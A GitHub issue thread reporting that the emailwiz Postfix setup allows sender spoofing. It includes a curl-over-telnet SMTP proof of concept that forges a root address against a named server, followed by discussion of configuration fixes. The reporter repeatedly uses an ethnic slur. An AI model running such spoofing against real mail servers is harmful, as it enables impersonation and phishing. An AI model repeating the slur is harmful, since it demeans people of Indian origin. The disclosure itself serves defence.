### ISSUE TITLE
pajeet security...

### ISSUE THREAD

**Issue by 1984gobrr** [LukeSmithxyz/emailwiz#254]
Easy to spoof from your domain to your domain.
Basic pajeet stuff.

Need  to set : `smtpd_recipient_restrictions = permit_sasl_authenticated, reject`

POC to show vuln:

```
curl telnet://mail.cedars.xyz:25 <<EOF
EHLO mail.cedars.xyz
MAIL FROM:<root@lukesmith.xyz>
RCPT TO:<root@lukesmith.xyz>
DATA
From: <root@lukesmith.xyz>
To: <root@lukesmith.xyz>
Subject: seeeeriiouz

This is peeejett securiiity
The date is `date`

.
QUIT
EOF
```

I can send an email from your root account to any account on your system.
Not good for multi-user systems.

**Comment by adamzea** [comment]
That change caused all external incoming emails to bounce on my server with the error:
554 5.7.1 <[adam@domain.com](mailto:adam@domain.com)>: Recipient address rejected: Access denied

Reverting to:
postconf -e 'smtpd_recipient_restrictions = permit_sasl_authenticated, permit_mynetworks, reject_unauth_destination, reject_unknown_recipient_domain'
... allows external email delivery again.

**Comment by fiplox** [comment]
It does cause not receiving emails. But the current config does allow for email spoofing. I was digging around, changing variables, nothing prevents it without breaking everything.

**Comment by fiplox** [comment]
Temporarily, to prevent this type of spoofing, one can use spamhaus public mirrors
https://docs.spamhaus.com/datasets/docs/source/40-real-world-usage/PublicMirrors/MTAs/020-Postfix.html

**Comment by LukeSmithxyz** [comment]
Should be actually fixed now in #238.
